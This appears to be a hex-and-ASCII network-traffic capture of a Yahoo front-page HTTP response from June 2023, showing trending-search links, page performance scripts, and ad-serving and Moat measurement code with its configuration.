                                                                                                                                                                        2023-06-02 11:13:21 UTC730INData Raw: 32 35 34 31 22 2c 22 61 37 61 30 33 61 63 66 2d 65 34 63 38 2d 33 33 66 36 2d 39 32 62 39 2d 38 34 64 33 38 62 64 34 62 61 30 62 22 2c 22 33 39 38 35 30 37 34 30 34 32 37 22 2c 22 63 33 32 64 30 39 30 38 2d 63 38 63 65 2d 33 30 35 39 2d 62 31 36 33 2d 64 65 39 62 33 63 39 61 66 66 33 61 22 2c 22 63 62 64 63 34 33 66 61 2d 30 37 62 34 2d 33 31 37 31 2d 39 37 63 33 2d 38 32 30 32 34 65 63 38 39 34 31 33 22 2c 22 34 64 61 64 30 38 31 31 2d 36 66 61 62 2d 33 30 62 63 2d 39 30 39 33 2d 36 61 64 63 39 65 61 35 66 37 66 38 22 2c 22 32 31 62 30 61 39 33 61 2d 66 66 66 66 2d 33 62 31 61 2d 39 62 30 61 2d 62 34 32 30 35 34 63 66 39 32 33 35 22 2c 22 34 65 65 38 32 39 30 64 2d 32 66 33 32 2d 33 31 30 35 2d 38 34 33 64 2d 64 66 33 31 39 34 38 63 62 37 34 39 22 2c 22
                                                                                                                                                                        Data Ascii: 2541","a7a03acf-e4c8-33f6-92b9-84d38bd4ba0b","39850740427","c32d0908-c8ce-3059-b163-de9b3c9aff3a","cbdc43fa-07b4-3171-97c3-82024ec89413","4dad0811-6fab-30bc-9093-6adc9ea5f7f8","21b0a93a-ffff-3b1a-9b0a-b42054cf9235","4ee8290d-2f32-3105-843d-df31948cb749","
                                                                                                                                                                        2023-06-02 11:13:21 UTC731INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 28 27 73 74 72 65 61 6d 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 65 61 73 75 72 65 28 27 73 74 72 65 61 6d 44 6f 6e 65 27 2c 27 50 61 67 65 53 74 61 72 74 27 2c 27 73 74 72 65 61 6d 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 6d 61 69 6e 3e 3c 61 73 69 64 65 20 69 64 3d 41 73 69 64 65 20 72 6f 6c 65 3d 63 6f 6d 70 6c 65 6d 65 6e 74 61 72 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 61 73 69 64 65 2d 73 74 69 63 6b 79 20 64 61 74 61 2d 77 66 2d 73 74 69 63 6b 79 2d 70 6f
                                                                                                                                                                        Data Ascii: window.performance.mark('stream'); window.performance.measure('streamDone','PageStart','stream'); </script></div></main><aside id=Aside role=complementary><div class=aside-sticky data-wf-sticky-po
                                                                                                                                                                        2023-06-02 11:13:21 UTC732INData Raw: 69 74 63 3a 30 3b 72 73 70 6e 73 3a 6e 61 76 3b 63 61 74 3a 74 72 65 6e 64 69 6e 3b 74 35 3a 74 65 78 74 3b 74 35 70 6f 73 3a 31 3b 74 35 63 61 74 3a 6f 72 67 3b 6b 74 3a 6f 72 67 3b 62 70 6f 73 3a 31 3b 72 65 71 5f 74 3a 31 36 38 35 37 30 34 34 30 31 3b 62 61 74 63 68 5f 69 64 3a 32 30 32 33 30 36 30 32 31 31 30 37 3b 63 70 6f 73 3a 31 3b 6c 74 78 74 3a 4e 61 74 69 6f 6e 61 6c 20 53 70 65 6c 6c 69 6e 67 20 42 65 65 3b 73 6c 6b 3a 4e 61 74 69 6f 6e 61 6c 20 53 70 65 6c 6c 69 6e 67 20 42 65 65 22 20 63 6c 61 73 73 3d 22 44 28 69 62 29 20 54 64 28 6e 29 3a 68 20 54 64 28 6e 29 20 43 75 72 28 70 29 20 43 28 24 73 72 63 68 48 75 6c 6b 50 61 6e 74 73 29 3a 68 20 43 28 24 73 72 63 68 46 75 6a 69 49 6e 6b 77 65 6c 6c 29 20 46 7a 28 31 32 70 78 29 20 46 77 28 36
                                                                                                                                                                        Data Ascii: itc:0;rspns:nav;cat:trendin;t5:text;t5pos:1;t5cat:org;kt:org;bpos:1;req_t:1685704401;batch_id:202306021107;cpos:1;ltxt:National Spelling Bee;slk:National Spelling Bee" class="D(ib) Td(n):h Td(n) Cur(p) C($srchHulkPants):h C($srchFujiInkwell) Fz(12px) Fw(6
                                                                                                                                                                        2023-06-02 11:13:21 UTC734INData Raw: 79 20 4f 68 22 20 64 61 74 61 2d 79 6c 6b 3d 22 74 31 3a 61 34 3b 74 32 3a 74 63 2d 74 73 3b 74 33 3a 63 74 3b 73 65 63 3a 74 63 2d 74 73 3b 69 74 63 3a 30 3b 72 73 70 6e 73 3a 6e 61 76 3b 63 61 74 3a 74 72 65 6e 64 69 6e 3b 74 35 3a 74 65 78 74 3b 74 35 70 6f 73 3a 33 3b 74 35 63 61 74 3a 6f 72 67 3b 6b 74 3a 6f 72 67 3b 62 70 6f 73 3a 31 3b 72 65 71 5f 74 3a 31 36 38 35 37 30 34 34 30 31 3b 62 61 74 63 68 5f 69 64 3a 32 30 32 33 30 36 30 32 31 31 30 37 3b 63 70 6f 73 3a 33 3b 6c 74 78 74 3a 4a 61 63 6b 79 20 4f 68 3b 73 6c 6b 3a 4a 61 63 6b 79 20 4f 68 22 20 63 6c 61 73 73 3d 22 44 28 69 62 29 20 54 64 28 6e 29 3a 68 20 54 64 28 6e 29 20 43 75 72 28 70 29 20 43 28 24 73 72 63 68 48 75 6c 6b 50 61 6e 74 73 29 3a 68 20 43 28 24 73 72 63 68 46 75 6a 69 49
                                                                                                                                                                        Data Ascii: y Oh" data-ylk="t1:a4;t2:tc-ts;t3:ct;sec:tc-ts;itc:0;rspns:nav;cat:trendin;t5:text;t5pos:3;t5cat:org;kt:org;bpos:1;req_t:1685704401;batch_id:202306021107;cpos:3;ltxt:Jacky Oh;slk:Jacky Oh" class="D(ib) Td(n):h Td(n) Cur(p) C($srchHulkPants):h C($srchFujiI
                                                                                                                                                                        2023-06-02 11:13:21 UTC735INData Raw: 65 64 64 69 6e 67 22 20 64 61 74 61 2d 79 6c 6b 3d 22 74 31 3a 61 34 3b 74 32 3a 74 63 2d 74 73 3b 74 33 3a 63 74 3b 73 65 63 3a 74 63 2d 74 73 3b 69 74 63 3a 30 3b 72 73 70 6e 73 3a 6e 61 76 3b 63 61 74 3a 74 72 65 6e 64 69 6e 3b 74 35 3a 74 65 78 74 3b 74 35 70 6f 73 3a 35 3b 74 35 63 61 74 3a 6f 72 67 3b 6b 74 3a 6f 72 67 3b 62 70 6f 73 3a 31 3b 72 65 71 5f 74 3a 31 36 38 35 37 30 34 34 30 31 3b 62 61 74 63 68 5f 69 64 3a 32 30 32 33 30 36 30 32 31 31 30 37 3b 63 70 6f 73 3a 35 3b 6c 74 78 74 3a 4a 6f 72 64 61 6e 20 52 6f 79 61 6c 20 57 65 64 64 69 6e 67 3b 73 6c 6b 3a 4a 6f 72 64 61 6e 20 52 6f 79 61 6c 20 57 65 64 64 69 6e 67 22 20 63 6c 61 73 73 3d 22 44 28 69 62 29 20 54 64 28 6e 29 3a 68 20 54 64 28 6e 29 20 43 75 72 28 70 29 20 43 28 24 73 72 63
                                                                                                                                                                        Data Ascii: edding" data-ylk="t1:a4;t2:tc-ts;t3:ct;sec:tc-ts;itc:0;rspns:nav;cat:trendin;t5:text;t5pos:5;t5cat:org;kt:org;bpos:1;req_t:1685704401;batch_id:202306021107;cpos:5;ltxt:Jordan Royal Wedding;slk:Jordan Royal Wedding" class="D(ib) Td(n):h Td(n) Cur(p) C($src
                                                                                                                                                                        2023-06-02 11:13:21 UTC736INData Raw: 72 63 68 3f 70 26 23 78 33 44 3b 4e 6f 6f 72 2b 41 6c 66 61 6c 6c 61 68 26 61 6d 70 3b 66 72 26 23 78 33 44 3b 66 70 2d 74 74 73 26 61 6d 70 3b 66 72 32 26 23 78 33 44 3b 70 3a 66 70 2c 6d 3a 74 6e 2c 63 74 3a 61 6c 6c 2c 6b 74 3a 6f 72 67 2c 70 67 3a 31 2c 73 74 6c 3a 74 78 74 2c 62 3a 22 20 74 69 74 6c 65 3d 22 4e 6f 6f 72 20 41 6c 66 61 6c 6c 61 68 22 20 64 61 74 61 2d 79 6c 6b 3d 22 74 31 3a 61 34 3b 74 32 3a 74 63 2d 74 73 3b 74 33 3a 63 74 3b 73 65 63 3a 74 63 2d 74 73 3b 69 74 63 3a 30 3b 72 73 70 6e 73 3a 6e 61 76 3b 63 61 74 3a 74 72 65 6e 64 69 6e 3b 74 35 3a 74 65 78 74 3b 74 35 70 6f 73 3a 37 3b 74 35 63 61 74 3a 6f 72 67 3b 6b 74 3a 6f 72 67 3b 62 70 6f 73 3a 31 3b 72 65 71 5f 74 3a 31 36 38 35 37 30 34 34 30 31 3b 62 61 74 63 68 5f 69 64 3a
                                                                                                                                                                        Data Ascii: rch?p&#x3D;Noor+Alfallah&amp;fr&#x3D;fp-tts&amp;fr2&#x3D;p:fp,m:tn,ct:all,kt:org,pg:1,stl:txt,b:" title="Noor Alfallah" data-ylk="t1:a4;t2:tc-ts;t3:ct;sec:tc-ts;itc:0;rspns:nav;cat:trendin;t5:text;t5pos:7;t5cat:org;kt:org;bpos:1;req_t:1685704401;batch_id:
                                                                                                                                                                        2023-06-02 11:13:21 UTC737INData Raw: 68 3f 70 26 23 78 33 44 3b 42 72 75 63 65 2b 57 69 6c 6c 69 73 26 61 6d 70 3b 66 72 26 23 78 33 44 3b 66 70 2d 74 74 73 26 61 6d 70 3b 66 72 32 26 23 78 33 44 3b 70 3a 66 70 2c 6d 3a 74 6e 2c 63 74 3a 61 6c 6c 2c 6b 74 3a 6f 72 67 2c 70 67 3a 31 2c 73 74 6c 3a 74 78 74 2c 62 3a 22 20 74 69 74 6c 65 3d 22 42 72 75 63 65 20 57 69 6c 6c 69 73 22 20 64 61 74 61 2d 79 6c 6b 3d 22 74 31 3a 61 34 3b 74 32 3a 74 63 2d 74 73 3b 74 33 3a 63 74 3b 73 65 63 3a 74 63 2d 74 73 3b 69 74 63 3a 30 3b 72 73 70 6e 73 3a 6e 61 76 3b 63 61 74 3a 74 72 65 6e 64 69 6e 3b 74 35 3a 74 65 78 74 3b 74 35 70 6f 73 3a 39 3b 74 35 63 61 74 3a 6f 72 67 3b 6b 74 3a 6f 72 67 3b 62 70 6f 73 3a 31 3b 72 65 71 5f 74 3a 31 36 38 35 37 30 34 34 30 31 3b 62 61 74 63 68 5f 69 64 3a 32 30 32 33
                                                                                                                                                                        Data Ascii: h?p&#x3D;Bruce+Willis&amp;fr&#x3D;fp-tts&amp;fr2&#x3D;p:fp,m:tn,ct:all,kt:org,pg:1,stl:txt,b:" title="Bruce Willis" data-ylk="t1:a4;t2:tc-ts;t3:ct;sec:tc-ts;itc:0;rspns:nav;cat:trendin;t5:text;t5pos:9;t5cat:org;kt:org;bpos:1;req_t:1685704401;batch_id:2023
                                                                                                                                                                        2023-06-02 11:13:21 UTC739INData Raw: 62 73 22 5d 7d 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 62 33 30 32 35 39 30 33 66 38 34 66 38 64 66 32 33 37 30 63 32 39 38 36 63 33 32 31 36 32 34 63 37 39 66 33 66 38 39 39 32 32 61 34 62 31 30 39 61 30 39 63 64 63 63 39 64 62 66 32 33 31 31 33 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 28 27 74 72 65 6e 64 69 6e 67 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 65 61 73 75 72 65 28 27 74 72 65 6e 64 69 6e 67 44 6f 6e 65 27 2c 27 50 61 67 65 53 74 61 72 74 27 2c 27 74 72 65 6e 64 69 6e 67 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: bs"]}</script><script nonce=b3025903f84f8df2370c2986c321624c79f3f89922a4b109a09cdcc9dbf23113> window.performance.mark('trending'); window.performance.measure('trendingDone','PageStart','trending');
                                                                                                                                                                        2023-06-02 11:13:21 UTC740INData Raw: 46 7a 28 31 32 70 78 29 20 43 28 23 36 65 37 37 38 30 29 20 48 28 32 35 30 70 78 29 22 3e 41 64 76 65 72 74 69 73 65 6d 65 6e 74 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 73 64 61 2d 4d 4f 4e 20 63 6c 61 73 73 3d 22 20 4d 62 28 32 30 70 78 29 20 4d 4f 4e 2d 73 74 61 74 75 73 2d 65 72 72 6f 72 2d 63 6f 6c 6c 61 70 73 65 64 22 3e 3c 64 69 76 20 69 64 3d 73 64 61 2d 4d 4f 4e 2d 69 66 72 61 6d 65 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 21 2d 2d 20 53 70 61 63 65 49 44 3d 32 30 32 33 35 33 38 30 37 35 20 6c 6f 63 3d 4d 4f 4e 20 6e 6f 61 64 20 2d 2d 3e 3c 21 2d 2d 20 66 61 63 32 2d 72 65 70 6c 61 63 65 64 2d 67 64 32 20 62 6f 6f 6b 69 6e 67 20 69 64 20 2d 2d 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 22 20 68 65 69 67 68 74 3d 22
                                                                                                                                                                        Data Ascii: Fz(12px) C(#6e7780) H(250px)">Advertisement</div></div></div><div id=sda-MON class=" Mb(20px) MON-status-error-collapsed"><div id=sda-MON-iframe><noscript>... SpaceID=2023538075 loc=MON noad -->... fac2-replaced-gd2 booking id --><img width="1" height="
                                                                                                                                                                        2023-06-02 11:13:21 UTC741INData Raw: 33 38 31 30 39 31 38 30 3b 69 6d 70 72 65 66 73 65 71 3d 31 39 39 39 30 35 32 31 37 33 36 38 35 39 33 36 39 3b 69 6d 70 72 65 66 74 73 3d 31 36 38 35 37 30 34 34 30 31 3b 61 64 63 6c 6e 74 69 64 3d 31 30 30 34 3b 73 70 61 63 65 69 64 3d 32 30 32 33 35 33 38 30 37 35 3b 61 64 70 6f 73 69 74 69 6f 6e 3d 4d 4f 4e 3b 6c 6d 73 69 64 3d 3b 72 65 76 73 68 61 72 65 3d 6c 75 25 32 35 33 41 30 25 32 35 33 42 70 74 25 32 35 33 41 68 6f 6d 65 25 32 35 33 42 73 69 74 65 25 32 35 33 41 66 70 25 32 35 33 42 76 65 72 25 32 35 33 41 6d 65 67 61 73 74 72 6d 3b 70 76 69 64 3d 37 4d 6a 47 42 7a 45 77 4c 6a 4c 6f 30 73 38 4d 54 58 77 6a 4c 79 6d 37 4d 54 41 79 4c 67 41 41 41 41 43 6b 42 4e 55 75 3b 73 65 63 74 69 6f 6e 69 64 3d 31 34 36 37 35 30 30 35 31 3b 6b 76 73 65 63 75
                                                                                                                                                                        Data Ascii: 38109180;imprefseq=19990521736859369;imprefts=1685704401;adclntid=1004;spaceid=2023538075;adposition=MON;lmsid=;revshare=lu%253A0%253Bpt%253Ahome%253Bsite%253Afp%253Bver%253Amegastrm;pvid=7MjGBzEwLjLo0s8MTXwjLym7MTAyLgAAAACkBNUu;sectionid=146750051;kvsecu
                                                                                                                                                                        2023-06-02 11:13:21 UTC741INData Raw: 32 44 31 31 25 32 44 31 25 37 43 79 73 64 25 37 43 31 3b 6b 76 73 65 63 75 72 65 3d 74 72 75 65 3b 6b 76 6d 6e 3d 79 34 30 38 33 34 33 3b 6b 76 79 25 32 44 62 75 63 6b 65 74 3d 39 30 30 3b 6b 76 70 67 63 6f 6c 6f 3d 62 66 31 3b 6b 76 72 73 3d 6c 75 3a 73 69 74 65 3a 30 3a 70 74 3a 6d 65 67 61 73 74 72 6d 3a 66 70 3a 76 65 72 3a 68 6f 6d 65 3b 6b 76 73 73 70 3d 73 73 70 3b 6b 76 61 64 74 63 25 35 46 64 76 6d 6b 74 6e 61 6d 65 3d 75 6e 6b 6e 6f 77 6e 3b 6b 76 61 64 74 63 25 35 46 64 76 6f 73 70 6c 74 3d 77 69 6e 64 6f 77 73 25 35 46 31 30 3b 6b 76 61 64 74 63 25 35 46 64 76 62 72 61 6e 64 3d 6d 69 63 72 6f 73 6f 66 74 3b 6b 76 61 64 74 63 25 35 46 64 76 74 79 70 65 3d 64 65 73 6b 74 6f 70 3b 6b 76 61 64 74 63 25 35 46 64 76 6d 6f 64 65 6c 3d 69 6e 74 65 72
                                                                                                                                                                        Data Ascii: 2D11%2D1%7Cysd%7C1;kvsecure=true;kvmn=y408343;kvy%2Dbucket=900;kvpgcolo=bf1;kvrs=lu:site:0:pt:megastrm:fp:ver:home;kvssp=ssp;kvadtc%5Fdvmktname=unknown;kvadtc%5Fdvosplt=windows%5F10;kvadtc%5Fdvbrand=microsoft;kvadtc%5Fdvtype=desktop;kvadtc%5Fdvmodel=inter
                                                                                                                                                                        2023-06-02 11:13:21 UTC743INData Raw: 63 68 22 20 64 61 74 61 2d 77 66 2d 62 6f 64 79 3d 27 7b 22 62 75 63 6b 65 74 22 3a 22 39 30 30 22 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 78 68 72 50 61 74 68 50 72 65 66 69 78 22 3a 22 2f 66 70 5f 6d 73 2f 5f 72 63 76 2f 72 65 6d 6f 74 65 22 7d 2c 22 63 74 72 6c 22 3a 22 46 6f 6f 74 65 72 44 65 73 6b 74 6f 70 22 2c 22 69 6e 73 74 61 6e 63 65 5f 69 64 22 3a 22 66 6f 6f 74 65 72 22 2c 22 6d 5f 69 64 22 3a 22 72 65 61 63 74 2d 77 61 66 65 72 2d 66 6f 6f 74 65 72 22 2c 22 6d 5f 6d 6f 64 65 22 3a 22 6a 73 6f 6e 22 2c 22 73 70 61 63 65 49 64 22 3a 32 30 32 33 35 33 38 30 37 35 2c 22 77 6f 65 69 64 22 3a 31 32 38 39 31 31 37 30 2c 22 74 69 6d 65 6f 75 74 22 3a 31 30 30 30 30 7d 27 20 64 61 74 61 2d 77 66 2d 62 6f 75 6e 64 61 72 79 3d 66 70 2d 6d 6f 64 75 6c 65 20
                                                                                                                                                                        Data Ascii: ch" data-wf-body='{"bucket":"900","config":{"xhrPathPrefix":"/fp_ms/_rcv/remote"},"ctrl":"FooterDesktop","instance_id":"footer","m_id":"react-wafer-footer","m_mode":"json","spaceId":2023538075,"woeid":12891170,"timeout":10000}' data-wf-boundary=fp-module
                                                                                                                                                                        2023-06-02 11:13:21 UTC744INData Raw: 30 34 34 30 31 7c 31 39 39 39 30 35 32 31 37 33 36 38 35 39 33 36 30 5c 5c 5c 22 3b 5c 5c 6e 5c 22 29 3b 5c 72 5c 6e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 5c 22 76 61 72 20 67 64 70 72 3d 5c 5c 5c 22 30 5c 5c 5c 22 3b 5c 5c 6e 5c 22 29 3b 5c 72 5c 6e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 5c 22 76 61 72 20 67 64 70 72 5f 63 6f 6e 73 65 6e 74 3d 5c 5c 5c 22 5c 5c 5c 22 3b 5c 5c 6e 5c 22 29 3b 5c 72 5c 6e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 5c 22 2a 2d 2d 3e 5c 5c 6e 5c 22 29 3b 5c 6e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 5c 22 3c 73 63 72 5c 22 2b 5c 22 69 70 74 20 73 72 63 3d 5c 5c 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 65 62 2d 6f 61 6f 2e 73 73 70 2e 79 61 68 6f 6f 2e 63 6f 6d 5c 2f 61 64 6d 61 78 5c 2f 61 64 53 65 72 76 65
                                                                                                                                                                        Data Ascii: 04401|19990521736859360\\\";\\n\");\r\ndocument.write(\"var gdpr=\\\"0\\\";\\n\");\r\ndocument.write(\"var gdpr_consent=\\\"\\\";\\n\");\r\ndocument.write(\"*-->\\n\");\ndocument.write(\"<scr\"+\"ipt src=\\\"https:\/\/web-oao.ssp.yahoo.com\/admax\/adServe
                                                                                                                                                                        2023-06-02 11:13:21 UTC745INData Raw: 49 44 3d 32 5c 5c 6e 5c 22 29 3b 5c 6e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 5c 22 76 61 72 20 7a 4d 6f 61 74 43 75 73 74 6f 6d 56 69 73 70 3d 35 30 5c 5c 6e 5c 22 29 3b 5c 6e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 5c 22 76 61 72 20 7a 4d 6f 61 74 43 75 73 74 6f 6d 56 69 73 74 3d 31 30 30 30 5c 5c 6e 5c 22 29 3b 5c 6e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 5c 22 76 61 72 20 7a 4d 6f 61 74 49 73 41 64 76 69 73 47 6f 61 6c 3d 30 5c 5c 6e 5c 22 29 3b 5c 6e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 5c 22 76 61 72 20 7a 4d 6f 61 74 45 76 65 6e 74 55 72 6c 3d 68 74 74 70 73 3a 5c 2f 5c 2f 35 2e 72 61 73 2e 79 61 68 6f 6f 2e 63 6f 6d 5c 2f 61 64 63 6f 75 6e 74 7c 32 2e 30 7c 35 31 31 33 2e 31 7c 34 38 33 30 34 34 31 7c 30 7c 32 32 35 7c 41
                                                                                                                                                                        Data Ascii: ID=2\\n\");\ndocument.write(\"var zMoatCustomVisp=50\\n\");\ndocument.write(\"var zMoatCustomVist=1000\\n\");\ndocument.write(\"var zMoatIsAdvisGoal=0\\n\");\ndocument.write(\"var zMoatEventUrl=https:\/\/5.ras.yahoo.com\/adcount|2.0|5113.1|4830441|0|225|A
                                                                                                                                                                        2023-06-02 11:13:21 UTC746INData Raw: 61 74 53 61 6d 70 6c 69 6e 67 52 61 74 65 3d 35 5c 5c 6e 5c 22 29 3b 5c 6e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 5c 22 76 61 72 20 7a 4d 6f 61 74 6c 69 76 65 54 65 73 74 43 6f 6f 6b 69 65 3d 5c 5c 6e 5c 22 29 3b 5c 6e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 5c 22 76 61 72 20 7a 4d 6f 61 74 52 65 66 53 65 71 49 64 3d 67 37 41 41 4c 59 55 42 48 42 41 5c 5c 6e 5c 22 29 3b 5c 6e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 5c 22 76 61 72 20 7a 4d 6f 61 74 49 6d 70 52 65 66 54 73 3d 31 36 38 35 37 30 34 34 30 31 5c 5c 6e 5c 22 29 3b 5c 6e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 5c 22 76 61 72 20 7a 4d 6f 61 74 41 6c 69 61 73 3d 79 34 30 36 31 39 31 5c 5c 6e 5c 22 29 3b 5c 6e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 5c 22 76 61 72 20 7a 4d
                                                                                                                                                                        Data Ascii: atSamplingRate=5\\n\");\ndocument.write(\"var zMoatliveTestCookie=\\n\");\ndocument.write(\"var zMoatRefSeqId=g7AALYUBHBA\\n\");\ndocument.write(\"var zMoatImpRefTs=1685704401\\n\");\ndocument.write(\"var zMoatAlias=y406191\\n\");\ndocument.write(\"var zM
                                                                                                                                                                        2023-06-02 11:13:21 UTC748INData Raw: 6f 61 74 49 73 41 64 76 69 73 47 6f 61 6c 3d 30 26 7a 4d 6f 61 74 45 76 65 6e 74 55 72 6c 3d 68 74 74 70 73 3a 5c 2f 5c 2f 35 2e 72 61 73 2e 79 61 68 6f 6f 2e 63 6f 6d 5c 2f 61 64 63 6f 75 6e 74 7c 32 2e 30 7c 35 31 31 33 2e 31 7c 34 38 33 30 34 34 31 7c 30 7c 32 32 35 7c 41 64 49 64 3d 31 31 31 30 31 39 31 31 3b 42 6e 49 64 3d 32 3b 63 74 3d 32 37 35 31 38 31 34 39 37 34 3b 73 74 3d 36 35 33 38 3b 61 64 63 69 64 3d 31 3b 69 74 69 6d 65 3d 37 30 34 34 30 31 30 38 30 3b 72 65 71 74 79 70 65 3d 35 3b 3b 69 6d 70 72 65 66 3d 31 36 38 35 37 30 34 34 30 31 32 37 33 38 31 30 39 31 34 31 3b 69 6d 70 72 65 66 73 65 71 3d 31 39 39 39 30 35 32 31 37 33 36 38 35 39 33 36 30 3b 69 6d 70 72 65 66 74 73 3d 31 36 38 35 37 30 34 34 30 31 3b 61 64 63 6c 6e 74 69 64 3d 31
                                                                                                                                                                        Data Ascii: oatIsAdvisGoal=0&zMoatEventUrl=https:\/\/5.ras.yahoo.com\/adcount|2.0|5113.1|4830441|0|225|AdId=11101911;BnId=2;ct=2751814974;st=6538;adcid=1;itime=704401080;reqtype=5;;impref=16857044012738109141;imprefseq=19990521736859360;imprefts=1685704401;adclntid=1
                                                                                                                                                                        2023-06-02 11:13:21 UTC749INData Raw: 7c 35 31 31 33 2e 31 7c 34 38 33 30 34 34 31 7c 30 7c 32 32 35 7c 41 64 49 64 3d 31 31 31 30 31 39 31 31 3b 42 6e 49 64 3d 32 3b 63 74 3d 32 37 35 31 38 31 34 39 37 34 3b 73 74 3d 36 37 38 33 3b 61 64 63 69 64 3d 31 3b 69 74 69 6d 65 3d 37 30 34 34 30 31 30 38 30 3b 72 65 71 74 79 70 65 3d 35 3b 3b 69 6d 70 72 65 66 3d 31 36 38 35 37 30 34 34 30 31 32 37 33 38 31 30 39 31 34 31 3b 69 6d 70 72 65 66 73 65 71 3d 31 39 39 39 30 35 32 31 37 33 36 38 35 39 33 36 30 3b 69 6d 70 72 65 66 74 73 3d 31 36 38 35 37 30 34 34 30 31 3b 61 64 63 6c 6e 74 69 64 3d 31 30 30 34 3b 73 70 61 63 65 69 64 3d 32 30 32 33 35 33 38 30 37 35 3b 61 64 70 6f 73 69 74 69 6f 6e 3d 4c 44 52 42 3b 6c 6d 73 69 64 3d 3b 72 65 76 73 68 61 72 65 3d 6c 75 25 32 35 33 41 30 25 32 35 33 42 70
                                                                                                                                                                        Data Ascii: |5113.1|4830441|0|225|AdId=11101911;BnId=2;ct=2751814974;st=6783;adcid=1;itime=704401080;reqtype=5;;impref=16857044012738109141;imprefseq=19990521736859360;imprefts=1685704401;adclntid=1004;spaceid=2023538075;adposition=LDRB;lmsid=;revshare=lu%253A0%253Bp
                                                                                                                                                                        2023-06-02 11:13:21 UTC750INData Raw: 6c 6f 3d 62 66 31 3b 6b 76 72 73 3d 6c 75 3a 73 69 74 65 3a 30 3a 70 74 3a 6d 65 67 61 73 74 72 6d 3a 66 70 3a 76 65 72 3a 68 6f 6d 65 3b 6b 76 73 73 70 3d 73 73 70 3b 6b 76 61 64 74 63 25 35 46 64 76 6d 6b 74 6e 61 6d 65 3d 75 6e 6b 6e 6f 77 6e 3b 6b 76 61 64 74 63 25 35 46 64 76 6f 73 70 6c 74 3d 77 69 6e 64 6f 77 73 25 35 46 31 30 3b 6b 76 61 64 74 63 25 35 46 64 76 62 72 61 6e 64 3d 6d 69 63 72 6f 73 6f 66 74 3b 6b 76 61 64 74 63 25 35 46 64 76 74 79 70 65 3d 64 65 73 6b 74 6f 70 3b 6b 76 61 64 74 63 25 35 46 64 76 6d 6f 64 65 6c 3d 69 6e 74 65 72 6e 65 74 25 35 46 65 78 70 6c 6f 72 65 72 25 35 46 25 32 44 25 35 46 77 69 6e 64 6f 77 73 3b 6b 76 72 65 70 6f 25 35 46 64 76 6f 73 70 6c 74 3d 77 69 6e 64 6f 77 73 25 35 46 31 30 3b 6b 76 61 64 74 63 25 35
                                                                                                                                                                        Data Ascii: lo=bf1;kvrs=lu:site:0:pt:megastrm:fp:ver:home;kvssp=ssp;kvadtc%5Fdvmktname=unknown;kvadtc%5Fdvosplt=windows%5F10;kvadtc%5Fdvbrand=microsoft;kvadtc%5Fdvtype=desktop;kvadtc%5Fdvmodel=internet%5Fexplorer%5F%2D%5Fwindows;kvrepo%5Fdvosplt=windows%5F10;kvadtc%5
                                                                                                                                                                        2023-06-02 11:13:21 UTC752INData Raw: 6e 6f 41 64 22 3a 66 61 6c 73 65 2c 22 70 61 73 73 62 61 63 6b 22 3a 66 61 6c 73 65 2c 22 70 72 69 6f 72 69 74 79 22 3a 66 61 6c 73 65 7d 2c 22 4c 52 45 43 22 3a 7b 22 65 78 63 6c 75 73 69 76 65 22 3a 74 72 75 65 2c 22 66 61 6c 6c 42 61 63 6b 22 3a 66 61 6c 73 65 2c 22 6e 6f 41 64 22 3a 66 61 6c 73 65 2c 22 70 61 73 73 62 61 63 6b 22 3a 66 61 6c 73 65 2c 22 70 72 69 6f 72 69 74 79 22 3a 66 61 6c 73 65 7d 2c 22 4d 41 53 54 22 3a 7b 22 65 78 63 6c 75 73 69 76 65 22 3a 66 61 6c 73 65 2c 22 66 61 6c 6c 42 61 63 6b 22 3a 66 61 6c 73 65 2c 22 6e 6f 41 64 22 3a 74 72 75 65 2c 22 70 61 73 73 62 61 63 6b 22 3a 66 61 6c 73 65 2c 22 70 72 69 6f 72 69 74 79 22 3a 66 61 6c 73 65 7d 2c 22 4d 4f 4e 22 3a 7b 22 65 78 63 6c 75 73 69 76 65 22 3a 66 61 6c 73 65 2c 22 66 61
                                                                                                                                                                        Data Ascii: noAd":false,"passback":false,"priority":false},"LREC":{"exclusive":true,"fallBack":false,"noAd":false,"passback":false,"priority":false},"MAST":{"exclusive":false,"fallBack":false,"noAd":true,"passback":false,"priority":false},"MON":{"exclusive":false,"fa
